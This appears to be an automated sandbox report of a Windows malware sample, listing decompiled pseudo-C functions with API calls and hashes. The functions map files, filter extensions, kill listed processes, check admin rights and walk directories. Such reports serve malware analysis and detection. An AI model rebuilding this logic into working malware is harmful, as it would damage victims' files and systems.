                                        • Opcode ID: 2ee79f82eab171010b92a82065b94d47a2caada3147338485a49379818dd1f3f
                                        • Instruction ID: cd403c33321bfe05b1f8e858b5b953a9e64edd3393160eb5cd269fb2108d0eea
                                        • Opcode Fuzzy Hash: 2ee79f82eab171010b92a82065b94d47a2caada3147338485a49379818dd1f3f
                                        • Instruction Fuzzy Hash: 5101C4B5148300BBE3209F24CC8AF163BACAB45B21F204604FB659A1C2D7B89564CB59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 85%
                                        			E0F9D2890(WCHAR* __ecx, intOrPtr __edx) {
                                        				long _v8;
                                        				intOrPtr _v12;
                                        				void* _v16;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t14;
                                        				void* _t18;
                                        				void* _t23;
                                        				WCHAR* _t29;
                                        				void* _t34;
                                        				signed int _t35;
                                        				long _t37;
                                        				void* _t38;
                                        				void* _t40;
                                        
                                        				_t29 = __ecx;
                                        				_t28 = 0;
                                        				_v12 = __edx;
                                        				_t34 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
                                        				if(_t34 == 0xffffffff) {
                                        					L3:
                                        					return 0;
                                        				} else {
                                        					_v8 = GetFileSize(_t34, 0);
                                        					E0F9D3030(0, _t34, _t35);
                                        					asm("sbb esi, esi");
                                        					_t37 = (_t35 & 0x00000003) + 1;
                                        					_t14 = E0F9D3030(0, _t34, _t37);
                                        					asm("sbb eax, eax");
                                        					_t18 = CreateFileMappingW(_t34, 0, ( ~_t14 & 0xfffffffa) + 8, 0, 0, 0);
                                        					_v16 = _t18;
                                        					if(_t18 != 0) {
                                        						_t38 = MapViewOfFile(_t18, _t37, 0, 0, 0);
                                        						if(_t38 != 0) {
                                        							_t23 = E0F9D3030(0, _t34, _t38);
                                        							if(_t23 == 0) {
                                        								_push(_t29);
                                        								_t4 = _t38 + 0x53; // 0x53
                                        								_t29 = _t4;
                                        								_t5 = _t23 + 6; // 0x6
                                        								E0F9D82A0(_t29, _t5);
                                        								_t40 = _t40 + 4;
                                        							}
                                        							_push(_t29);
                                        							_t28 = E0F9D2830(_v12, _t38, _v8);
                                        							UnmapViewOfFile(_t38);
                                        						}
                                        						CloseHandle(_v16);
                                        						CloseHandle(_t34);
                                        						return _t28;
                                        					} else {
                                        						CloseHandle(_t34);
                                        						goto L3;
                                        					}
                                        				}
			}

                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,74CF82B0,00000000,?,?,0F9D2C02), ref: 0F9D28AB
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,0F9D2C02), ref: 0F9D28BA
                                        • CreateFileMappingW.KERNEL32(00000000,00000000,-00000008,00000000,00000000,00000000,?,?,0F9D2C02), ref: 0F9D28E5
                                        • CloseHandle.KERNEL32(00000000,?,?,0F9D2C02), ref: 0F9D28F3
                                        • MapViewOfFile.KERNEL32(00000000,74CF82B1,00000000,00000000,00000000,?,?,0F9D2C02), ref: 0F9D290A
                                        • UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,0F9D2C02), ref: 0F9D2942
                                        • CloseHandle.KERNEL32(?,?,?,0F9D2C02), ref: 0F9D2951
                                        • CloseHandle.KERNEL32(00000000,?,?,0F9D2C02), ref: 0F9D2954
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseHandle$CreateView$MappingSizeUnmap
                                        • String ID:
                                        • API String ID: 265113797-0
                                        • Opcode ID: 8e576b455ec9157ecf32e980671fc580164067d028ea1d5d72608e5930a0fb66
                                        • Instruction ID: 822f489a2f8fbf4dac1b4ed45c13d4a9ab873360c6d5d64cc8e4a0219f41615f
                                        • Opcode Fuzzy Hash: 8e576b455ec9157ecf32e980671fc580164067d028ea1d5d72608e5930a0fb66
                                        • Instruction Fuzzy Hash: BE213871A012197FE3206BB49C85F7F776CDB85676F308224FD01E32C2E6389C2149A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 97%
                                        			E0F9D6850(WCHAR* __ecx) {
                                        				intOrPtr _v8;
                                        				signed int _t11;
                                        				void* _t20;
                                        				void* _t23;
                                        				signed int _t26;
                                        				signed int _t27;
                                        				intOrPtr _t28;
                                        				void* _t31;
                                        				signed short* _t35;
                                        				WCHAR* _t38;
                                        				WCHAR* _t40;
                                        				void* _t44;
                                        
                                        				_push(__ecx);
                                        				_t38 = __ecx;
                                        				if( *0xf9e2a60 != 0) {
                                        					_t11 = lstrlenW(__ecx);
                                        					_t40 = _t38 + _t11 * 2 + 0xfffffffe;
                                        					if(_t11 == 0) {
                                        						L7:
                                        						return 1;
                                        					} else {
                                        						while( *_t40 != 0x2e) {
                                        							_t40 = _t40 - 2;
                                        							_t11 = _t11 - 1;
                                        							if(_t11 != 0) {
                                        								continue;
                                        							}
                                        							break;
                                        						}
                                        						if(_t11 != 0) {
                                        							_t23 = VirtualAlloc(0, 4 + lstrlenW(_t40) * 2, 0x3000, 4);
                                        							wsprintfW(_t23, L"%s ", _t40);
                                        							_t35 =  *0xf9e2a60; // 0x0
                                        							_t28 = 0;
                                        							_v8 = 0;
                                        							if( *_t23 == 0) {
                                        								L20:
                                        								_t29 =  !=  ? 1 : _t28;
                                        								_v8 =  !=  ? 1 : _t28;
                                        							} else {
                                        								_t26 =  *_t35 & 0x0000ffff;
                                        								if(_t26 != 0) {
                                        									_t44 = _t35 - _t23;
                                        									do {
                                        										_t20 = _t23;
                                        										if(_t26 == 0) {
                                        											L16:
                                        											if( *_t20 == 0) {
                                        												goto L19;
                                        											} else {
                                        												goto L17;
                                        											}
                                        										} else {
                                        											while(1) {
                                        												_t27 =  *_t20 & 0x0000ffff;
                                        												if(_t27 == 0) {
                                        													break;
                                        												}
                                        												_t31 = ( *(_t44 + _t20) & 0x0000ffff) - _t27;
                                        												if(_t31 != 0) {
                                        													goto L16;
                                        												} else {
                                        													_t20 = _t20 + 2;
                                        													if( *(_t44 + _t20) != _t31) {
                                        														continue;
                                        													} else {
                                        														goto L16;
                                        													}
                                        												}
                                        												goto L21;
                                        											}
                                        											L19:
                                        											_t28 = 0;
                                        											goto L20;
                                        										}
                                        										goto L21;
                                        										L17:
                                        										_t26 = _t35[1] & 0x0000ffff;
                                        										_t35 =  &(_t35[1]);
                                        										_t44 = _t44 + 2;
                                        									} while (_t26 != 0);
                                        								}
                                        							}
                                        							L21:
                                        							VirtualFree(_t23, 0, 0x8000);
                                        							return _v8;
                                        						} else {
                                        							goto L7;
                                        						}
                                        					}
                                        				} else {
                                        					return 1;
                                        				}
			}

                                        APIs
                                        • lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,?,0F9D698A), ref: 0F9D6872
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: %s
                                        • API String ID: 1659193697-4273690596
                                        • Opcode ID: 8e67ce7481fd142d2bff3df60002288fecb908c5082f09d326806e134051fad0
                                        • Instruction ID: 220044b21a863b118e7884348ec18289af32a7bd8d70384166d6060dd4a1cb93
                                        • Opcode Fuzzy Hash: 8e67ce7481fd142d2bff3df60002288fecb908c5082f09d326806e134051fad0
                                        • Instruction Fuzzy Hash: CA212772A0122897E7385F2CAC003F673ECEF84325FA5C126FE459B1C2E7B569908290
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E0F9D4C40(WCHAR* __ecx) {
                                        				struct _PROCESS_INFORMATION _v20;
                                        				struct _STARTUPINFOW _v92;
                                        				intOrPtr _t15;
                                        				intOrPtr _t16;
                                        				WCHAR* _t25;
                                        
                                        				asm("xorps xmm0, xmm0");
                                        				_t25 = __ecx;
                                        				asm("movdqu [ebp-0x10], xmm0");
                                        				E0F9D9010( &_v92, 0, 0x44);
                                        				_t15 =  *0xf9e2a6c; // 0x49c
                                        				_v92.hStdError = _t15;
                                        				_v92.hStdOutput = _t15;
                                        				_t16 =  *0xf9e2a68; // 0x4a4
                                        				_v92.dwFlags = _v92.dwFlags | 0x00000101;
                                        				_v92.hStdInput = _t16;
                                        				_v92.wShowWindow = 0;
                                        				_v92.cb = 0x44;
                                        				if(CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v20) != 0) {
                                        					CloseHandle(_v20);
                                        					return CloseHandle(_v20.hThread);
                                        				} else {
                                        					return GetLastError();
                                        				}
                                        			}


                                        APIs
                                        • _memset.LIBCMT ref: 0F9D4C59
                                        • CreateProcessW.KERNEL32 ref: 0F9D4C9F
                                        • GetLastError.KERNEL32(?,?,00000000), ref: 0F9D4CA9
                                        • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0F9D4CBD
                                        • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0F9D4CC2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandle$CreateErrorLastProcess_memset
                                        • String ID: D
                                        • API String ID: 1393943095-2746444292
                                        • Opcode ID: fb0a166359b1416d4cc49898cf0cff4c8ea6a83f5a795235605d8265b9e872d3
                                        • Instruction ID: d5c176166556a1cec192e4fde72d849ed3edbaa42d9fd8a2de9c06f5343fc7d6
                                        • Opcode Fuzzy Hash: fb0a166359b1416d4cc49898cf0cff4c8ea6a83f5a795235605d8265b9e872d3
                                        • Instruction Fuzzy Hash: 2F016171E44318ABEB20DBA4DC05BDE7BB8EF04715F204126F608FA180E7B525648B98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0F9D48A8(void* __ebx, WCHAR* __ecx, void* __esi, void* __ebp, void* _a12) {
                                        				int _t8;
                                        				int _t9;
                                        				void* _t15;
                                        				WCHAR* _t17;
                                        				void* _t18;
                                        				signed int _t23;
                                        				void* _t24;
                                        				void* _t28;
                                        
                                        				_t17 = __ecx;
                                        				_t15 = __ebx;
                                        				while(1) {
                                        					L2:
                                        					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
                                        					if(_t8 == 0) {
                                        						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
                                        						if(_t18 != 0) {
                                        							TerminateProcess(_t18, 0);
                                        							CloseHandle(_t18);
                                        						}
                                        					}
                                        					_t23 = _t23 + 1;
                                        					_t5 = _t15 + 0x24; // 0x24
                                        					_t17 = _t5;
                                        					if(_t23 < 0x27) {
                                        						continue;
                                        					}
                                        					L7:
                                        					_t24 = _a12;
                                        					_t9 = Process32NextW(_t24, _t15);
                                        					_t7 = _t15 + 0x24; // 0x24
                                        					_t17 = _t7;
                                        					if(_t9 != 0) {
                                        						_t23 = 0;
                                        						do {
                                        							goto L2;
                                        						} while (_t23 < 0x27);
                                        						goto L7;
                                        					}
                                        					if(_t15 != 0) {
                                        						VirtualFree(_t15, 0, 0x8000);
                                        					}
                                        					return CloseHandle(_t24);
                                        					L2:
                                        					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
                                        					if(_t8 == 0) {
                                        						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
                                        						if(_t18 != 0) {
                                        							TerminateProcess(_t18, 0);
                                        							CloseHandle(_t18);
                                        						}
                                        					}
                                        					_t23 = _t23 + 1;
                                        					_t5 = _t15 + 0x24; // 0x24
                                        					_t17 = _t5;
                                        				}
                                        			}

                                        APIs
                                        • lstrcmpiW.KERNEL32(00000002,00000024), ref: 0F9D48B5
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0F9D48C5
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0F9D48D4
                                        • CloseHandle.KERNEL32(00000000), ref: 0F9D48E1
                                        • Process32NextW.KERNEL32(?,00000000), ref: 0F9D48FA
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D4913
                                        • CloseHandle.KERNEL32(?), ref: 0F9D491A
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleProcess$FreeNextOpenProcess32TerminateVirtuallstrcmpi
                                        • String ID:
                                        • API String ID: 999196985-0
                                        • Opcode ID: 29c2c596a43e13983be63ca31ab453c9e7a51d9deeea4ad92d9bd36f1549700a
                                        • Instruction ID: 0c13e90c3f37b1b6ccbedb493f378c29d98aa27ca2bf31660fff7f38523b81a4
                                        • Opcode Fuzzy Hash: 29c2c596a43e13983be63ca31ab453c9e7a51d9deeea4ad92d9bd36f1549700a
                                        • Instruction Fuzzy Hash: B3012D36205101AFE7259F65EC48BAA736CEF85762F304034FE0997083DB75E8648FA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 63%
                                        			E0F9D3AA0() {
                                        				signed int _v8;
                                        				void* _v12;
                                        				short _v16;
                                        				struct _SID_IDENTIFIER_AUTHORITY _v20;
                                        				int _t13;
                                        				_Unknown_base(*)()* _t15;
                                        				signed int _t16;
                                        
                                        				_v20.Value = 0;
                                        				_v16 = 0x500;
                                        				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                                        				if(_t13 != 0) {
                                        					_t15 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
                                        					_t16 =  *_t15(0, _v12,  &_v8);
                                        					asm("sbb eax, eax");
                                        					_v8 = _v8 &  ~_t16;
                                        					FreeSid(_v12);
                                        					return _v8;
                                        				} else {
                                        					return _t13;
                                        				}
                                        			}

                                        APIs
                                        • AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0F9D3AD0
                                        • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0F9D3AE3
                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0F9D3AEF
                                        • FreeSid.ADVAPI32(?), ref: 0F9D3B0A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressAllocateFreeHandleInitializeModuleProc
                                        • String ID: CheckTokenMembership$advapi32.dll
                                        • API String ID: 3309497720-1888249752
                                        • Opcode ID: 18914138cd8a4ae0d84f515ac4a858540ed74b990cd854cf46b19445d37c76dd
                                        • Instruction ID: fd64464d9024e11344a8e38af1d1083c35d9bf8365ec0ac1056304d397eabc77
                                        • Opcode Fuzzy Hash: 18914138cd8a4ae0d84f515ac4a858540ed74b990cd854cf46b19445d37c76dd
                                        • Instruction Fuzzy Hash: 56F04F30A4530DBBEF109BE4DC0AFADB778EB04716F204584F905E6182E7B866648B55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 94%
                                        			E0F9D6D09() {
                                        				intOrPtr* _t34;
                                        				intOrPtr* _t38;
                                        				void* _t40;
                                        				WCHAR* _t46;
                                        				void* _t51;
                                        
                                        				do {
                                        					if(lstrcmpW(_t51 - 0x238, ".") != 0 && lstrcmpW(_t51 - 0x238, L"..") != 0) {
                                        						lstrcatW(_t46, _t51 - 0x238);
                                        						if(( *(_t51 - 0x264) & 0x00000010) == 0) {
                                        							 *((intOrPtr*)(_t51 - 0xc)) =  *_t38;
                                        							 *_t38 =  *_t38 + E0F9D6950(_t46, _t51 - 0x264, __eflags, _t40,  *((intOrPtr*)(_t51 + 8)));
                                        							asm("adc [ebx+0x4], edx");
                                        							__eflags =  *((intOrPtr*)(_t38 + 4)) -  *((intOrPtr*)(_t38 + 4));
                                        							if(__eflags <= 0) {
                                        								if(__eflags < 0) {
                                        									L8:
                                        									_t34 =  *((intOrPtr*)(_t51 + 0xc));
                                        									 *_t34 =  *_t34 + 1;
                                        									__eflags =  *_t34;
                                        								} else {
                                        									__eflags =  *((intOrPtr*)(_t51 - 0xc)) -  *_t38;
                                        									if(__eflags < 0) {
                                        										goto L8;
                                        									}
                                        								}
                                        							}
                                        						} else {
                                        							E0F9D6C90(lstrcatW(_t46, "\\"), _t46,  *((intOrPtr*)(_t51 - 0x14)),  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)), _t38);
                                        						}
                                        						 *((short*)( *((intOrPtr*)(_t51 - 0x10)))) = 0;
                                        					}
                                        				} while (FindNextFileW( *(_t51 - 8), _t51 - 0x264) != 0);
                                        				FindClose( *(_t51 - 8));
                                        				return 0;
                                        			}

                                        APIs
                                        • lstrcmpW.KERNEL32(?,0F9DFEC8,?,?), ref: 0F9D6D1C
                                        • lstrcmpW.KERNEL32(?,0F9DFECC,?,?), ref: 0F9D6D36
                                        • lstrcatW.KERNEL32(00000000,?), ref: 0F9D6D48
                                        • lstrcatW.KERNEL32(00000000,0F9DFEFC), ref: 0F9D6D59
                                          • Part of subcall function 0F9D6C90: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F9D6CC3
                                          • Part of subcall function 0F9D6C90: lstrcatW.KERNEL32(00000000,0F9DFEC4), ref: 0F9D6CDB
                                          • Part of subcall function 0F9D6C90: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F9D6CE5
                                        • FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0F9D6DBD
                                        • FindClose.KERNEL32(00003000,?,?), ref: 0F9D6DCE
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Findlstrcat$Filelstrcmp$CloseFirstNextlstrlen
                                        • String ID:
                                        • API String ID: 2032009209-0
                                        • Opcode ID: 101370233d85c7fbbd36b4bdc30c3d7d908449c2eedbbae6644d54c7daa7327c
                                        • Instruction ID: c2b7066f0b0fcd1e62520437090976c7bdf39c3eadaeb314cad133264c0ec824
                                        • Opcode Fuzzy Hash: 101370233d85c7fbbd36b4bdc30c3d7d908449c2eedbbae6644d54c7daa7327c
                                        • Instruction Fuzzy Hash: 88019231A04209AADF11AF64EC48BEE7BBCEF85301F2080A6F905D5092DB359B65DF20
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0F9D3200(void* __ecx, CHAR* _a4, intOrPtr _a8) {
                                        				char _t5;
                                        				char _t6;
                                        				intOrPtr _t8;
                                        				int _t10;
                                        				CHAR* _t13;
                                        				int _t15;
                                        				void* _t18;
                                        				CHAR* _t21;
                                        				CHAR* _t23;
                                        
                                        				_t23 = _a4;
                                        				_t18 = __ecx;
                                        				_t5 =  *_t23;
                                        				if(_t5 == 0) {
                                        					L4:
                                        					_t6 =  *_t23;
                                        					if(_t6 == 0x7d) {
                                        						goto L10;
                                        					} else {
                                        						_t21 = _t23;
                                        						if(_t6 != 0) {
                                        							while( *_t21 != 0x7d) {
                                        								_t21 =  &(_t21[1]);
                                        								if( *_t21 != 0) {
                                        									continue;
                                        								} else {
                                        								}
                                        								goto L12;
                                        							}
                                        							 *_t21 = 0;
                                        						}
                                        						L12:
                                        						_t8 = _a8;
                                        						if(_t8 != 1) {
                                        							if(_t8 == 2) {
                                        								_t10 = lstrlenA(_t23);
                                        								_t13 = HeapAlloc(GetProcessHeap(), 8, _t10 + 1);
                                        								 *(_t18 + 8) = _t13;
                                        								goto L16;
                                        							}
                                        						} else {
                                        							_t15 = lstrlenA(_t23);
                                        							_t13 = HeapAlloc(GetProcessHeap(), 8, _t15 + 1);
                                        							 *(_t18 + 4) = _t13;
                                        							L16:
                                        							if(_t13 != 0) {
                                        								lstrcpyA(_t13, _t23);
                                        							}
                                        						}
                                        						 *_t21 = 0x7d;
                                        						return 1;
                                        					}
                                        				} else {
                                        					while(_t5 != 0x7d) {
                                        						_t23 =  &(_t23[1]);
                                        						if(_t5 == 0x3d) {
                                        							goto L4;
                                        						} else {
                                        							_t5 =  *_t23;
                                        							if(_t5 != 0) {
                                        								continue;
                                        							} else {
                                        								goto L4;
                                        							}
                                        						}
                                        						goto L19;
                                        					}
                                        					L10:
                                        					return 0;
                                        				}
                                        				L19:
                                        			}

                                        			Instruction addresses (one entry per decompiled line above): 0x0f9d3205, 0x0f9d3208, 0x0f9d320a, 0x0f9d320e, 0x0f9d321f, 0x0f9d321f, 0x0f9d3223, 0x00000000, 0x0f9d3225, 0x0f9d3226, 0x0f9d322a, 0x0f9d3230, 0x0f9d3235, 0x0f9d3239, 0x00000000, 0x00000000, 0x0f9d323b, 0x00000000, 0x0f9d3239, 0x0f9d3245, 0x0f9d3245, 0x0f9d3248, 0x0f9d3248, 0x0f9d324e, 0x0f9d3270, 0x0f9d3273, 0x0f9d3284, 0x0f9d328a, 0x00000000, 0x0f9d328a, 0x0f9d3250, 0x0f9d3251, 0x0f9d3262, 0x0f9d3268, 0x0f9d328d, 0x0f9d328f, 0x0f9d3293, 0x0f9d3293, 0x0f9d328f, 0x0f9d3299, 0x0f9d32a5, 0x0f9d32a5, 0x0f9d3210, 0x0f9d3210, 0x0f9d3214, 0x0f9d3217, 0x00000000, 0x0f9d3219, 0x0f9d3219, 0x0f9d321d, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0f9d321d, 0x00000000, 0x0f9d3217, 0x0f9d323e, 0x0f9d3242, 0x0f9d3242, 0x00000000

                                        APIs
                                        • lstrlenA.KERNEL32(0F9D52F0,00000000,?,0F9D52F1,?,0F9D34BF,0F9D52F1,00000001,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D3251
                                        • GetProcessHeap.KERNEL32(00000008,00000001,?,0F9D34BF,0F9D52F1,00000001,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D325B
                                        • HeapAlloc.KERNEL32(00000000,?,0F9D34BF,0F9D52F1,00000001,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D3262
                                        • lstrlenA.KERNEL32(0F9D52F0,00000000,?,0F9D52F1,?,0F9D34BF,0F9D52F1,00000001,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D3273
                                        • GetProcessHeap.KERNEL32(00000008,00000001,?,0F9D34BF,0F9D52F1,00000001,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D327D
                                        • HeapAlloc.KERNEL32(00000000,?,0F9D34BF,0F9D52F1,00000001,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D3284
                                        • lstrcpyA.KERNEL32(00000000,0F9D52F0,?,0F9D34BF,0F9D52F1,00000001,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D3293
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocProcesslstrlen$lstrcpy
                                        • String ID:
                                        • API String ID: 511007297-0
                                        • Opcode ID: 207fc6d70b0720cc3de088976f2a1f5535eec1b52208e9fd038fb4db2c3f1e61
                                        • Instruction ID: 9257a7390a5bef036132b5f92ebc87f15ae39da7b187e8b39800f2465428626d
                                        • Opcode Fuzzy Hash: 207fc6d70b0720cc3de088976f2a1f5535eec1b52208e9fd038fb4db2c3f1e61
                                        • Instruction Fuzzy Hash: 9A11B9318091556EEB310F689848FA67B6CEF12362F74C505FAC5CB283C73994A68772
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 97%
                                        			E0F9D33E0(int* __ecx, void* __eflags, CHAR* _a4) {
                                        				int* _v8;
                                        				void* _t8;
                                        				char _t10;
                                        				void* _t14;
                                        				void* _t15;
                                        				char _t18;
                                        				char _t19;
                                        				int _t20;
                                        				CHAR* _t23;
                                        				CHAR* _t26;
                                        				CHAR* _t35;
                                        				CHAR* _t40;
                                        
                                        				_push(__ecx);
                                        				_t26 = _a4;
                                        				_t37 = __ecx;
                                        				_v8 = __ecx;
                                        				__ecx[3] = _t26;
                                        				_t8 = E0F9D32B0(__ecx);
                                        				if(_t8 == 0 || _t8 == 0xffffffff) {
                                        					ExitProcess(0);
                                        				}
                                        				if(E0F9D3320(__ecx) == 0) {
                                        					 *__ecx = 0;
                                        					_t10 =  *_t26;
                                        					if(_t10 == 0) {
                                        						goto L4;
                                        					} else {
                                        						do {
                                        							if(_t10 == 0x7b) {
                                        								_t26 =  &(_t26[1]);
                                        								_t14 = E0F9D3190(_t26);
                                        								if(_t14 != 0) {
                                        									_t15 = _t14 - 1;
                                        									if(_t15 == 0) {
                                        										E0F9D3200(_t37, _t26, 1);
                                        									} else {
                                        										if(_t15 == 1) {
                                        											_t18 =  *_t26;
                                        											_t35 = _t26;
                                        											if(_t18 == 0) {
                                        												L15:
                                        												_t19 =  *_t35;
                                        												if(_t19 != 0x7d) {
                                        													_t40 = _t35;
                                        													if(_t19 != 0) {
                                        														while( *_t40 != 0x7d) {
                                        															_t40 =  &(_t40[1]);
                                        															if( *_t40 != 0) {
                                        																continue;
                                        															} else {
                                        															}
                                        															goto L21;
                                        														}
                                        														 *_t40 = 0;
                                        													}
                                        													L21:
                                        													_t20 = lstrlenA(_t35);
                                        													_t23 = HeapAlloc(GetProcessHeap(), 8, _t20 + 1);
                                        													 *(_v8 + 8) = _t23;
                                        													if(_t23 != 0) {
                                        														lstrcpyA(_t23, _t35);
                                        													}
                                        													 *_t40 = 0x7d;
                                        													_t37 = _v8;
                                        												}
                                        											} else {
                                        												while(_t18 != 0x7d) {
                                        													_t35 =  &(_t35[1]);
                                        													if(_t18 == 0x3d) {
                                        														goto L15;
                                        													} else {
                                        														_t18 =  *_t35;
                                        														if(_t18 != 0) {
                                        															continue;
                                        														} else {
                                        															goto L15;
                                        														}
                                        													}
                                        													goto L25;
                                        												}
                                        											}
                                        										}
                                        									}
                                        								}
                                        							}
                                        							L25:
                                        							_t7 =  &(_t26[1]); // 0x850f00e8
                                        							_t10 =  *_t7;
                                        							_t26 =  &(_t26[1]);
                                        						} while (_t10 != 0);
                                        						return 1;
                                        					}
                                        				} else {
                                        					 *__ecx = 1;
                                        					L4:
                                        					return 1;
                                        				}
                                        			}

